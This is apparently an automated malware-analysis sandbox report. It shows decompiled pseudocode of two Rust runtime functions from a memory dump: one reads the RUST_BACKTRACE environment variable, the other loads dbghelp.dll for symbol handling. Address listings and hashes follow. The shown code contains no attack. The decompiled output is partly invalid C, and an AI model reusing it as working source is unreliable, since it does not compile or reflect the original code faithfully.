                          Function 6E4AD530, Relevance: 26.7, APIs: 14, Strings: 1, Instructions: 445memoryCOMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 81%
                          			E6E4AD530(signed int __ebx, long* __ecx, signed int __edi, long __esi, char _a8) {
				long _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				signed int _v36;
				long _v40;
				void* _v44;
				void* _v48;
				long _v52;
				signed int _v56;
				void* _v60;
				signed int _v64;
				signed int _v68;
				void* _v72;
				long* _v76;
				signed int _v80;
				signed int _v1096;
				long _v1100;
				void* _v1104;
				void* __ebp;
				void* _t142;
				void* _t143;
				void* _t148;
				signed int _t149;
				intOrPtr _t151;
				void* _t155;
				void* _t157;
				signed int _t158;
				signed int _t160;
				void** _t161;
				void* _t167;
				long _t171;
				signed int _t172;
				long _t173;
				void* _t179;
				void* _t181;
				long _t194;
				signed int _t195;
				signed char _t196;
				signed int _t199;
				signed int _t200;
				signed int _t211;
				signed int _t213;
				signed int _t214;
				void* _t218;
				intOrPtr _t220;
				signed int _t223;
				intOrPtr* _t224;
				intOrPtr _t226;
				signed int _t228;
				char* _t229;
				signed int _t230;
				signed int _t232;
				signed int _t238;
				signed int _t241;
				signed int _t242;
				WCHAR* _t247;
				long _t248;
				signed int _t249;
				signed int _t252;
				char* _t264;
				void* _t265;
				void* _t267;
				void* _t268;
				signed char* _t273;
				signed int _t274;
				void* _t280;
				intOrPtr _t281;

				_t262 = __esi;
				_t245 = __edi;
				_t192 = __ebx;
				_push(__ebx);
				_push(__edi);
				_push(__esi);
				_t281 = _t280 - 0x440;
				_v32 = _t281;
				_v20 = 0xffffffff;
				_v24 = E6E4B3B80;
				_v76 = __ecx;
				_v28 =  *[fs:0x0];
				 *[fs:0x0] =  &_v28;
				_t142 =  *0x6e4fadc8; // 0x5b0000
				if(_t142 != 0) {
					L3:
					_t143 = HeapAlloc(_t142, 0, 0xa);
					if(_t143 == 0) {
						goto L94;
					} else {
						_t264 = "UST_BACKTRACE";
						_t241 = 1;
						_t211 = 0;
						 *_t143 = 0x52;
						_v1104 = _t143;
						_v1100 = 5;
						_v1096 = 1;
						_v44 = 0;
						while(1) {
							_v36 = _t211;
							if(_t211 == 0) {
								goto L10;
							}
							_v44 = 0;
							_t211 = 0;
							if(_t241 != _v1100) {
								L6:
								_t245 = _v36;
								 *((short*)(_t143 + _t241 * 2)) = _v36;
								_t241 = _t241 + 1;
								_v1096 = _t241;
								continue;
							} else {
								L13:
								_v40 = _t264;
								_v20 = 0;
								_v48 = _t241;
								_t188 =  <  ? 0xffffffff : "RUST_BACKTRACE" - _t264 + 0x11;
								_t189 = ( <  ? 0xffffffff : "RUST_BACKTRACE" - _t264 + 0x11) >> 2;
								asm("sbb eax, 0x0");
								_t190 = (( <  ? 0xffffffff : "RUST_BACKTRACE" - _t264 + 0x11) >> 2) + 2;
								E6E4C7370( &_v1104, _t241, (( <  ? 0xffffffff : "RUST_BACKTRACE" - _t264 + 0x11) >> 2) + 2);
								_t281 = _t281 + 4;
								_t143 = _v1104;
								_t241 = _v48;
								_t264 = _v40;
								_t211 = _v44;
								goto L6;
							}
							L10:
							__eflags = _t264 - 0x6e4ed2be;
							if(_t264 != 0x6e4ed2be) {
								_t196 =  *_t264 & 0x000000ff;
								_t229 =  &(_t264[1]);
								_t249 = _t196 & 0x000000ff;
								__eflags = _t196;
								if(_t196 < 0) {
									_v36 = _t249 & 0x0000001f;
									__eflags = _t229 - 0x6e4ed2be;
									if(_t229 == 0x6e4ed2be) {
										_t230 = 0;
										__eflags = _t196 - 0xdf;
										_t252 = 0;
										_v40 = 0x6e4ed2be;
										if(_t196 > 0xdf) {
											goto L25;
										} else {
											_v36 = _v36 << 6;
											_t264 = 0x6e4ed2be;
											_t211 = 0;
											__eflags = _t241 - _v1100;
											if(_t241 != _v1100) {
												goto L6;
											} else {
												goto L13;
											}
										}
									} else {
										_t238 = _t264[1] & 0x000000ff;
										_t264 =  &(_t264[2]);
										_t230 = _t238 & 0x0000003f;
										__eflags = _t196 - 0xdf;
										if(_t196 <= 0xdf) {
											_t199 = _v36 << 0x00000006 | _t230;
											__eflags = _t199 - 0xffff;
											if(_t199 > 0xffff) {
												goto L32;
											} else {
												goto L22;
											}
										} else {
											__eflags = _t264 - 0x6e4ed2be;
											if(_t264 == 0x6e4ed2be) {
												_t252 = 0;
												__eflags = 0;
												_v40 = 0x6e4ed2be;
											} else {
												_v40 =  &(_t264[1]);
												_t252 =  *_t264 & 0x3f;
											}
											L25:
											_t232 = _t230 << 0x00000006 | _t252;
											__eflags = _t196 - 0xf0;
											if(_t196 < 0xf0) {
												_t199 = _v36 << 0x0000000c | _t232;
												_t264 = _v40;
												__eflags = _t199 - 0xffff;
												if(_t199 > 0xffff) {
													goto L32;
												} else {
													goto L22;
												}
											} else {
												_t273 = _v40;
												__eflags = _t273 - 0x6e4ed2be;
												if(_t273 == 0x6e4ed2be) {
													_t274 = 0;
													__eflags = 0;
													_v40 = 0x6e4ed2be;
												} else {
													_v40 =  &(_t273[1]);
													_t274 =  *_t273 & 0x3f;
												}
												_t199 = _t232 << 0x00000006 | (_v36 & 0x00000007) << 0x00000012 | _t274;
												_t264 = _v40;
												__eflags = _t199 - 0xffff;
												if(_t199 <= 0xffff) {
													L22:
													_v36 = _t199;
													_t211 = 0;
													__eflags = _t241 - _v1100;
													if(_t241 != _v1100) {
														goto L6;
													} else {
														goto L13;
													}
												} else {
													L32:
													_t200 = _t199 + 0xffff0000;
													_v40 = _t264;
													_v36 = _t200 >> 0x0000000a | 0x0000d800;
													_t264 = _v40;
													_t211 = _t200 & 0x000003ff | 0x0000dc00;
													_v44 = _t211;
													__eflags = _t241 - _v1100;
													if(_t241 != _v1100) {
														goto L6;
													} else {
														goto L13;
													}
												}
											}
										}
									}
								} else {
									_t264 = _t229;
									_v36 = _t249;
									_t211 = 0;
									__eflags = _t241 - _v1100;
									if(_t241 != _v1100) {
										goto L6;
									} else {
										goto L13;
									}
								}
								goto L96;
							}
							_t242 = _v1096;
							asm("movsd xmm0, [ebp-0x44c]");
							_v64 = _t242;
							asm("movsd [ebp-0x44], xmm0");
							__eflags = _t242 - 8;
							_t213 = _t242;
							_t148 = _v72;
							_t265 = _t148;
							if(_t242 < 8) {
								L45:
								_t214 = _t213 + _t213;
								asm("o16 nop [cs:eax+eax]");
								while(1) {
									__eflags = _t214;
									if(_t214 == 0) {
										break;
									}
									_t214 = _t214 + 0xfffffffe;
									__eflags =  *_t265;
									_t265 = _t265 + 2;
									if(__eflags != 0) {
										continue;
									} else {
										goto L48;
									}
									goto L96;
								}
								__eflags = _t242 - _v68;
								if(_t242 == _v68) {
									_v20 = 1;
									E6E4C7370( &_v72, _t242, 1);
									_t281 = _t281 + 4;
									_t148 = _v72;
									_t242 = _v64;
								}
								 *((short*)(_t148 + _t242 * 2)) = 0;
								asm("movsd xmm0, [ebp-0x44]");
								asm("movsd [ebp-0x38], xmm0");
								_t149 = _v60;
								__eflags = _t149;
								_v36 = _t149;
								if(_t149 == 0) {
									goto L75;
								} else {
									_v80 = _v56;
									E6E4BC310(_t245,  &_v1104, 0, 0x400);
									_t281 = _t281 + 0xc;
									_t155 =  *0x6e4ed0bc; // 0x2
									_t194 = 0x200;
									_t262 = 0;
									_v60 = _t155;
									_v56 = 0;
									_v48 = _t155;
									_v52 = 0;
									__eflags = 0x200 - 0x201;
									if(0x200 >= 0x201) {
										L65:
										_t157 = _t194 - _t262;
										__eflags = _v56 - _t262 - _t157;
										if(_v56 - _t262 < _t157) {
											_v44 = _t194;
											_v20 = 5;
											E6E4C7370( &_v60, _t262, _t157);
											_t281 = _t281 + 4;
											_t194 = _v44;
											_v48 = _v60;
										}
										_t247 = _v48;
										_t262 = _t194;
										_v52 = _t194;
										_v40 = _t194;
									} else {
										L68:
										_t247 =  &_v1104;
										_v40 = 0x200;
									}
									L69:
									_v44 = _t247;
									SetLastError(0);
									_t158 = GetEnvironmentVariableW(_v36, _t247, _t194);
									_t245 = _t158;
									__eflags = _t158;
									if(_t158 != 0) {
										L71:
										__eflags = _t245 - _t194;
										if(_t245 != _t194) {
											L63:
											__eflags = _t245 - _t194;
											_t192 = _t245;
											if(_t245 < _t194) {
												_t239 = _v40;
												_v20 = 5;
												__eflags = _t245 - _v40;
												if(__eflags > 0) {
													goto L95;
												} else {
													_push(_t245);
													E6E4B0EC0(_t192,  &_v72, _v44, _t245, _t262);
													_t281 = _t281 + 4;
													_t218 = _v72;
													_t248 = _v68;
													_t262 = _v64;
													_t195 = 0;
													_t160 = _v56;
													__eflags = _t160;
													if(_t160 != 0) {
														goto L81;
													} else {
													}
													goto L84;
												}
											} else {
												__eflags = _t192 - 0x201;
												if(_t192 < 0x201) {
													goto L68;
												} else {
													goto L65;
												}
												goto L69;
											}
										} else {
											_t171 = GetLastError();
											__eflags = _t171 - 0x7a;
											if(_t171 != 0x7a) {
												goto L63;
											} else {
												_t194 = _t194 + _t194;
												__eflags = _t194 - 0x201;
												if(_t194 < 0x201) {
													goto L68;
												} else {
													goto L65;
												}
												goto L69;
											}
										}
									} else {
										_t172 = GetLastError();
										__eflags = _t172;
										if(_t172 != 0) {
											_t195 = 1;
											_t173 = GetLastError();
											_t218 = 0;
											_t248 = _t173;
											_t160 = _v56;
											__eflags = _t160;
											if(_t160 != 0) {
												L81:
												__eflags = _v48;
												if(_v48 != 0) {
													__eflags = _t160 & 0x7fffffff;
													if((_t160 & 0x7fffffff) != 0) {
														_v44 = _t218;
														HeapFree( *0x6e4fadc8, 0, _v48);
														_t218 = _v44;
													}
												}
											}
											L84:
											__eflags = _t195;
											if(_t195 == 0) {
												_t161 = _v76;
												 *_t161 = _t218;
												_t161[1] = _t248;
												_t161[2] = _t262;
											} else {
												__eflags = _t218 - 3;
												 *_v76 = 0;
												if(_t218 == 3) {
													_v20 = 4;
													_v44 = _t248;
													 *((intOrPtr*)( *((intOrPtr*)(_t248 + 4))))( *_t248);
													_t281 = _t281 + 4;
													_t267 = _v44;
													_t220 =  *((intOrPtr*)(_t267 + 4));
													__eflags =  *(_t220 + 4);
													if( *(_t220 + 4) != 0) {
														_t167 =  *_t267;
														__eflags =  *((intOrPtr*)(_t220 + 8)) - 9;
														if( *((intOrPtr*)(_t220 + 8)) >= 9) {
															_t167 =  *(_t167 - 4);
														}
														HeapFree( *0x6e4fadc8, 0, _t167);
													}
													HeapFree( *0x6e4fadc8, 0, _t267);
												}
											}
											__eflags = _v80 & 0x7fffffff;
											if((_v80 & 0x7fffffff) != 0) {
												HeapFree( *0x6e4fadc8, 0, _v36);
											}
											goto L76;
										} else {
											goto L71;
										}
									}
								}
							} else {
								_t228 = _t242;
								_t268 = _t148;
								while(1) {
									__eflags =  *_t268;
									if( *_t268 == 0) {
										break;
									}
									__eflags =  *((short*)(_t268 + 2));
									if( *((short*)(_t268 + 2)) == 0) {
										break;
									} else {
										__eflags =  *((short*)(_t268 + 4));
										if( *((short*)(_t268 + 4)) == 0) {
											break;
										} else {
											__eflags =  *((short*)(_t268 + 6));
											if( *((short*)(_t268 + 6)) == 0) {
												break;
											} else {
												__eflags =  *((short*)(_t268 + 8));
												if( *((short*)(_t268 + 8)) == 0) {
													break;
												} else {
													__eflags =  *((short*)(_t268 + 0xa));
													if( *((short*)(_t268 + 0xa)) == 0) {
														break;
													} else {
														__eflags =  *((short*)(_t268 + 0xc));
														if( *((short*)(_t268 + 0xc)) == 0) {
															break;
														} else {
															__eflags =  *((short*)(_t268 + 0xe));
															if( *((short*)(_t268 + 0xe)) == 0) {
																break;
															} else {
																_t228 = _t228 + 0xfffffff8;
																_t268 = _t268 + 0x10;
																__eflags = _t228 - 7;
																if(_t228 > 7) {
																	continue;
																} else {
																	goto L45;
																}
															}
														}
													}
												}
											}
										}
									}
									goto L96;
								}
								L48:
								_t223 = _v68;
								_v56 = 0x6e4edec8;
								_v60 = 0x1402;
								__eflags = _t223;
								if(_t223 != 0) {
									__eflags = _t148;
									if(_t148 != 0) {
										__eflags = _t223 & 0x7fffffff;
										if((_t223 & 0x7fffffff) != 0) {
											HeapFree( *0x6e4fadc8, 0, _t148);
										}
									}
								}
								__eflags = _v60 - 3;
								if(_v60 == 3) {
									_t224 = _v56;
									_v36 = _t224;
									_t70 = _t224 + 4; // 0x2c
									_v20 = 2;
									 *((intOrPtr*)( *_t70))( *_t224);
									_t281 = _t281 + 4;
									_t179 = _v36;
									_t226 =  *((intOrPtr*)(_t179 + 4));
									__eflags =  *(_t226 + 4);
									if( *(_t226 + 4) != 0) {
										_t181 =  *_t179;
										__eflags =  *((intOrPtr*)(_t226 + 8)) - 9;
										if( *((intOrPtr*)(_t226 + 8)) >= 9) {
											_t181 =  *(_t181 - 4);
										}
										HeapFree( *0x6e4fadc8, 0, _t181);
										_t179 = _v56;
									}
									HeapFree( *0x6e4fadc8, 0, _t179);
								}
								L75:
								 *_v76 = 0;
								L76:
								_t151 = _v28;
								 *[fs:0x0] = _t151;
								return _t151;
							}
							goto L96;
						}
					}
				} else {
					_t142 = GetProcessHeap();
					if(_t142 == 0) {
						L94:
						_t239 = 2;
						E6E4C6C30(_t192, 0xa, 2, _t245, _t262, __eflags);
						asm("ud2");
						L95:
						E6E4C6DB0(_t192, _t245, _t239, _t245, _t262, __eflags, 0x6e4eded0);
						asm("ud2");
						__eflags =  &_a8;
						E6E4A4AA0( *_v44,  *((intOrPtr*)(_v44 + 4)));
						return E6E4AD420(_t263);
					} else {
						 *0x6e4fadc8 = _t142;
						goto L3;
					}
				}
				L96:
			}







































































                          0x6e4ad530
                          0x6e4ad530
                          0x6e4ad530
                          0x6e4ad533
                          0x6e4ad534
                          0x6e4ad535
                          0x6e4ad536
                          0x6e4ad53c
                          0x6e4ad53f
                          0x6e4ad546
                          0x6e4ad54d
                          0x6e4ad55a
                          0x6e4ad55d
                          0x6e4ad563
                          0x6e4ad56a
                          0x6e4ad57e
                          0x6e4ad583
                          0x6e4ad58a
                          0x00000000
                          0x6e4ad590
                          0x6e4ad590
                          0x6e4ad596
                          0x6e4ad59b
                          0x6e4ad59d
                          0x6e4ad5a2
                          0x6e4ad5a8
                          0x6e4ad5b2
                          0x6e4ad5bc
                          0x6e4ad5ed
                          0x6e4ad5f0
                          0x6e4ad5f3
                          0x00000000
                          0x00000000
                          0x6e4ad5f5
                          0x6e4ad5fc
                          0x6e4ad604
                          0x6e4ad5df
                          0x6e4ad5df
                          0x6e4ad5e2
                          0x6e4ad5e6
                          0x6e4ad5e7
                          0x00000000
                          0x6e4ad606
                          0x6e4ad63a
                          0x6e4ad644
                          0x6e4ad647
                          0x6e4ad64e
                          0x6e4ad659
                          0x6e4ad662
                          0x6e4ad66a
                          0x6e4ad66d
                          0x6e4ad671
                          0x6e4ad676
                          0x6e4ad5d0
                          0x6e4ad5d6
                          0x6e4ad5d9
                          0x6e4ad5dc
                          0x00000000
                          0x6e4ad5dc
                          0x6e4ad610
                          0x6e4ad616
                          0x6e4ad618
                          0x6e4ad61e
                          0x6e4ad621
                          0x6e4ad624
                          0x6e4ad627
                          0x6e4ad629
                          0x6e4ad681
                          0x6e4ad68a
                          0x6e4ad68c
                          0x6e4ad6b3
                          0x6e4ad6bb
                          0x6e4ad6be
                          0x6e4ad6c3
                          0x6e4ad6c6
                          0x00000000
                          0x6e4ad6c8
                          0x6e4ad6c8
                          0x6e4ad6cc
                          0x6e4ad6d2
                          0x6e4ad6d4
                          0x6e4ad6da
                          0x00000000
                          0x6e4ad6e0
                          0x00000000
                          0x6e4ad6e0
                          0x6e4ad6da
                          0x6e4ad68e
                          0x6e4ad68e
                          0x6e4ad692
                          0x6e4ad695
                          0x6e4ad698
                          0x6e4ad69b
                          0x6e4ad6eb
                          0x6e4ad6ed
                          0x6e4ad6f3
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4ad69d
                          0x6e4ad6a3
                          0x6e4ad6a5
                          0x6e4ad715
                          0x6e4ad715
                          0x6e4ad717
                          0x6e4ad6a7
                          0x6e4ad6ab
                          0x6e4ad6ae
                          0x6e4ad6ae
                          0x6e4ad71a
                          0x6e4ad71d
                          0x6e4ad71f
                          0x6e4ad722
                          0x6e4ad745
                          0x6e4ad747
                          0x6e4ad74a
                          0x6e4ad750
                          0x00000000
                          0x6e4ad752
                          0x00000000
                          0x6e4ad752
                          0x6e4ad724
                          0x6e4ad724
                          0x6e4ad72d
                          0x6e4ad72f
                          0x6e4ad75a
                          0x6e4ad75a
                          0x6e4ad75c
                          0x6e4ad731
                          0x6e4ad737
                          0x6e4ad73a
                          0x6e4ad73a
                          0x6e4ad76f
                          0x6e4ad771
                          0x6e4ad774
                          0x6e4ad77a
                          0x6e4ad6f9
                          0x6e4ad6f9
                          0x6e4ad6fc
                          0x6e4ad6fe
                          0x6e4ad704
                          0x00000000
                          0x6e4ad70a
                          0x00000000
                          0x6e4ad70a
                          0x6e4ad780
                          0x6e4ad780
                          0x6e4ad780
                          0x6e4ad786
                          0x6e4ad7a0
                          0x6e4ad7a3
                          0x6e4ad7a6
                          0x6e4ad7a8
                          0x6e4ad7ab
                          0x6e4ad7b1
                          0x00000000
                          0x6e4ad7b7
                          0x00000000
                          0x6e4ad7b7
                          0x6e4ad7b1
                          0x6e4ad77a
                          0x6e4ad722
                          0x6e4ad69b
                          0x6e4ad62b
                          0x6e4ad62b
                          0x6e4ad62d
                          0x6e4ad630
                          0x6e4ad632
                          0x6e4ad638
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4ad638
                          0x00000000
                          0x6e4ad629
                          0x6e4ad7bc
                          0x6e4ad7c2
                          0x6e4ad7ca
                          0x6e4ad7cd
                          0x6e4ad7d2
                          0x6e4ad7d5
                          0x6e4ad7d7
                          0x6e4ad7da
                          0x6e4ad7dc
                          0x6e4ad824
                          0x6e4ad824
                          0x6e4ad826
                          0x6e4ad830
                          0x6e4ad830
                          0x6e4ad832
                          0x00000000
                          0x00000000
                          0x6e4ad838
                          0x6e4ad83b
                          0x6e4ad83f
                          0x6e4ad842
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4ad842
                          0x6e4ad8d0
                          0x6e4ad8d3
                          0x6e4ad8d5
                          0x6e4ad8e1
                          0x6e4ad8e6
                          0x6e4ad8e9
                          0x6e4ad8ec
                          0x6e4ad8ec
                          0x6e4ad8ef
                          0x6e4ad8f5
                          0x6e4ad8fa
                          0x6e4ad8ff
                          0x6e4ad902
                          0x6e4ad904
                          0x6e4ad907
                          0x00000000
                          0x6e4ad90d
                          0x6e4ad910
                          0x6e4ad921
                          0x6e4ad926
                          0x6e4ad929
                          0x6e4ad92e
                          0x6e4ad933
                          0x6e4ad935
                          0x6e4ad938
                          0x6e4ad93f
                          0x6e4ad942
                          0x6e4ad949
                          0x6e4ad94f
                          0x6e4ad972
                          0x6e4ad977
                          0x6e4ad97b
                          0x6e4ad97d
                          0x6e4ad97f
                          0x6e4ad982
                          0x6e4ad98f
                          0x6e4ad994
                          0x6e4ad99a
                          0x6e4ad99d
                          0x6e4ad99d
                          0x6e4ad9a0
                          0x6e4ad9a3
                          0x6e4ad9a5
                          0x6e4ad9a8
                          0x6e4ad951
                          0x6e4ad9b0
                          0x6e4ad9b0
                          0x6e4ad9b6
                          0x6e4ad9b6
                          0x6e4ad9bd
                          0x6e4ad9bd
                          0x6e4ad9c2
                          0x6e4ad9cd
                          0x6e4ad9d3
                          0x6e4ad9d5
                          0x6e4ad9d7
                          0x6e4ad9e3
                          0x6e4ad9e3
                          0x6e4ad9e5
                          0x6e4ad960
                          0x6e4ad960
                          0x6e4ad962
                          0x6e4ad964
                          0x6e4ada26
                          0x6e4ada29
                          0x6e4ada30
                          0x6e4ada32
                          0x00000000
                          0x6e4ada38
                          0x6e4ada3e
                          0x6e4ada3f
                          0x6e4ada44
                          0x6e4ada47
                          0x6e4ada4a
                          0x6e4ada4d
                          0x6e4ada50
                          0x6e4ada52
                          0x6e4ada55
                          0x6e4ada57
                          0x00000000
                          0x00000000
                          0x6e4ada59
                          0x00000000
                          0x6e4ada57
                          0x6e4ad96a
                          0x6e4ad96a
                          0x6e4ad970
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4ad970
                          0x6e4ad9eb
                          0x6e4ad9eb
                          0x6e4ad9f1
                          0x6e4ad9f4
                          0x00000000
                          0x6e4ad9fa
                          0x6e4ad9fa
                          0x6e4ad9fc
                          0x6e4ada02
                          0x00000000
                          0x6e4ada04
                          0x00000000
                          0x6e4ada04
                          0x00000000
                          0x6e4ada02
                          0x6e4ad9f4
                          0x6e4ad9d9
                          0x6e4ad9d9
                          0x6e4ad9df
                          0x6e4ad9e1
                          0x6e4ada5b
                          0x6e4ada5d
                          0x6e4ada63
                          0x6e4ada65
                          0x6e4ada67
                          0x6e4ada6a
                          0x6e4ada6c
                          0x6e4ada6e
                          0x6e4ada6e
                          0x6e4ada72
                          0x6e4ada74
                          0x6e4ada79
                          0x6e4ada86
                          0x6e4ada89
                          0x6e4ada8e
                          0x6e4ada8e
                          0x6e4ada79
                          0x6e4ada72
                          0x6e4ada91
                          0x6e4ada91
                          0x6e4ada93
                          0x6e4adaed
                          0x6e4adaf0
                          0x6e4adaf2
                          0x6e4adaf5
                          0x6e4ada95
                          0x6e4ada98
                          0x6e4ada9b
                          0x6e4adaa1
                          0x6e4adaa8
                          0x6e4adab0
                          0x6e4adab3
                          0x6e4adab5
                          0x6e4adab8
                          0x6e4adabb
                          0x6e4adabe
                          0x6e4adac2
                          0x6e4adac4
                          0x6e4adac6
                          0x6e4adaca
                          0x6e4adacc
                          0x6e4adacc
                          0x6e4adad8
                          0x6e4adad8
                          0x6e4adae6
                          0x6e4adae6
                          0x6e4adaa1
                          0x6e4adaf8
                          0x6e4adaff
                          0x6e4adb10
                          0x6e4adb10
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4ad9e1
                          0x6e4ad9d7
                          0x6e4ad7de
                          0x6e4ad7de
                          0x6e4ad7e0
                          0x6e4ad7e2
                          0x6e4ad7e2
                          0x6e4ad7e6
                          0x00000000
                          0x00000000
                          0x6e4ad7e8
                          0x6e4ad7ed
                          0x00000000
                          0x6e4ad7ef
                          0x6e4ad7ef
                          0x6e4ad7f4
                          0x00000000
                          0x6e4ad7f6
                          0x6e4ad7f6
                          0x6e4ad7fb
                          0x00000000
                          0x6e4ad7fd
                          0x6e4ad7fd
                          0x6e4ad802
                          0x00000000
                          0x6e4ad804
                          0x6e4ad804
                          0x6e4ad809
                          0x00000000
                          0x6e4ad80b
                          0x6e4ad80b
                          0x6e4ad810
                          0x00000000
                          0x6e4ad812
                          0x6e4ad812
                          0x6e4ad817
                          0x00000000
                          0x6e4ad819
                          0x6e4ad819
                          0x6e4ad81c
                          0x6e4ad81f
                          0x6e4ad822
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4ad822
                          0x6e4ad817
                          0x6e4ad810
                          0x6e4ad809
                          0x6e4ad802
                          0x6e4ad7fb
                          0x6e4ad7f4
                          0x00000000
                          0x6e4ad7ed
                          0x6e4ad844
                          0x6e4ad844
                          0x6e4ad847
                          0x6e4ad84e
                          0x6e4ad855
                          0x6e4ad857
                          0x6e4ad859
                          0x6e4ad85b
                          0x6e4ad85d
                          0x6e4ad863
                          0x6e4ad86e
                          0x6e4ad86e
                          0x6e4ad863
                          0x6e4ad85b
                          0x6e4ad873
                          0x6e4ad877
                          0x6e4ad87d
                          0x6e4ad882
                          0x6e4ad885
                          0x6e4ad888
                          0x6e4ad890
                          0x6e4ad892
                          0x6e4ad895
                          0x6e4ad898
                          0x6e4ad89b
                          0x6e4ad89f
                          0x6e4ad8a1
                          0x6e4ad8a3
                          0x6e4ad8a7
                          0x6e4ad8a9
                          0x6e4ad8a9
                          0x6e4ad8b5
                          0x6e4ad8ba
                          0x6e4ad8ba
                          0x6e4ad8c6
                          0x6e4ad8c6
                          0x6e4ada09
                          0x6e4ada0c
                          0x6e4ada12
                          0x6e4ada12
                          0x6e4ada15
                          0x6e4ada25
                          0x6e4ada25
                          0x00000000
                          0x6e4ad7dc
                          0x6e4ad5ed
                          0x6e4ad56c
                          0x6e4ad56c
                          0x6e4ad573
                          0x6e4adb1a
                          0x6e4adb1f
                          0x6e4adb24
                          0x6e4adb29
                          0x6e4adb2b
                          0x6e4adb32
                          0x6e4adb3a
                          0x6e4adb44
                          0x6e4adb4f
                          0x6e4adb5f
                          0x6e4ad579
                          0x6e4ad579
                          0x00000000
                          0x6e4ad579
                          0x6e4ad573
                          0x00000000

                          APIs
                          • GetProcessHeap.KERNEL32 ref: 6E4AD56C
                          • HeapAlloc.KERNEL32(005B0000,00000000,0000000A), ref: 6E4AD583
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993730113.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000000.00000002.993716574.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993761074.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993781165.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993797257.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993806530.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: Heap$AllocProcess
                          • String ID: RUST_BACKTRACE
                          • API String ID: 1617791916-3454309823
                          • Opcode ID: 0c5f7bd75d09e436c601981dd3fc7f3283db205e979772c98a59bb758ecb30ba
                          • Instruction ID: 06ca22c6e0f9ca6aa4e73a3d960da5097dbe205bfeb7f7f5aa7c0b75468d0282
                          • Opcode Fuzzy Hash: 0c5f7bd75d09e436c601981dd3fc7f3283db205e979772c98a59bb758ecb30ba
                          • Instruction Fuzzy Hash: A302BEB1E002198BDB14CFF8D890BDDB7B1AF99328F15411ADA25B7384D771A941CF91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4AE690, Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 135libraryloadersynchronizationCOMMON
                          Download Yara Rule
                          C-Code - Quality: 52%
                          			E6E4AE690(void* __ebx, void* __edi, void* __esi, char _a8) {
				int _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				void* _v36;
				void* __ebp;
				void* _t15;
				struct HINSTANCE__* _t20;
				signed int _t21;
				void* _t23;
				_Unknown_base(*)()* _t25;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t30;
				void* _t35;
				_Unknown_base(*)()* _t38;
				_Unknown_base(*)()* _t39;
				signed int _t50;
				_Unknown_base(*)()* _t52;
				void* _t59;

				_t48 = __edi;
				_push(__edi);
				_v32 = _t59 - 0x14;
				_v20 = 0xffffffff;
				_v24 = E6E4B3BA0;
				_v28 =  *[fs:0x0];
				 *[fs:0x0] =  &_v28;
				_t35 =  *0x6e4fadc4; // 0x0
				if(_t35 == 0) {
					_t15 = CreateMutexA(0, 0, "Local\\RustBacktraceMutex");
					__eflags = _t15;
					if(_t15 == 0) {
						_t54 = 1;
						goto L19;
					} else {
						_t35 = _t15;
						__eflags = 0;
						asm("lock cmpxchg [0x6e4fadc4], ebx");
						if(0 != 0) {
							CloseHandle(_t35);
							_t35 = 0;
						}
						goto L1;
					}
				} else {
					L1:
					WaitForSingleObjectEx(_t35, 0xffffffff, 0);
					_t20 =  *0x6e4fadd0; // 0x0
					if(_t20 != 0) {
						L3:
						_t54 = 0;
						if( *0x6e4fae04 != 0) {
							goto L19;
						} else {
							_t38 =  *0x6e4fadd4; // 0x0
							if(_t38 != 0) {
								L7:
								_t21 =  *_t38();
								_t39 =  *0x6e4fadd8; // 0x0
								_t50 = _t21;
								if(_t39 != 0) {
									L10:
									 *_t39(_t50 | 0x00000004);
									_t52 =  *0x6e4faddc; // 0x0
									if(_t52 != 0) {
										L13:
										_t23 = GetCurrentProcess();
										 *_t52(_t23, 0, 1);
										 *0x6e4fae04 = 1;
										goto L19;
									} else {
										_t25 = GetProcAddress( *0x6e4fadd0, "SymInitializeW");
										if(_t25 == 0) {
											_v36 = _t35;
											_v20 = 0;
											E6E4C6E20(_t35, "called `Option::unwrap()` on a `None` value", 0x2b, _t52, _t54, __eflags, 0x6e4edcac);
											goto L23;
										} else {
											_t52 = _t25;
											 *0x6e4faddc = _t25;
											goto L13;
										}
									}
								} else {
									_t28 = GetProcAddress( *0x6e4fadd0, "SymSetOptions");
									if(_t28 == 0) {
										_v36 = _t35;
										_v20 = 0;
										E6E4C6E20(_t35, "called `Option::unwrap()` on a `None` value", 0x2b, _t50, _t54, __eflags, 0x6e4edc9c);
										goto L23;
									} else {
										_t39 = _t28;
										 *0x6e4fadd8 = _t28;
										goto L10;
									}
								}
							} else {
								_t30 = GetProcAddress(_t20, "SymGetOptions");
								if(_t30 == 0) {
									_v36 = _t35;
									_v20 = 0;
									E6E4C6E20(_t35, "called `Option::unwrap()` on a `None` value", 0x2b, _t48, 0, __eflags, 0x6e4edc8c);
									L23:
									asm("ud2");
									__eflags =  &_a8;
									return E6E4AE880(_v36);
								} else {
									_t38 = _t30;
									 *0x6e4fadd4 = _t30;
									goto L7;
								}
							}
						}
					} else {
						_t20 = LoadLibraryA("dbghelp.dll");
						 *0x6e4fadd0 = _t20;
						if(_t20 == 0) {
							ReleaseMutex(_t35);
							_t54 = 1;
							L19:
							 *[fs:0x0] = _v28;
							return _t54;
						} else {
							goto L3;
						}
					}
				}
			}






















                          0x6e4ae690
                          0x6e4ae694
                          0x6e4ae699
                          0x6e4ae69c
                          0x6e4ae6a3
                          0x6e4ae6b4
                          0x6e4ae6b7
                          0x6e4ae6bd
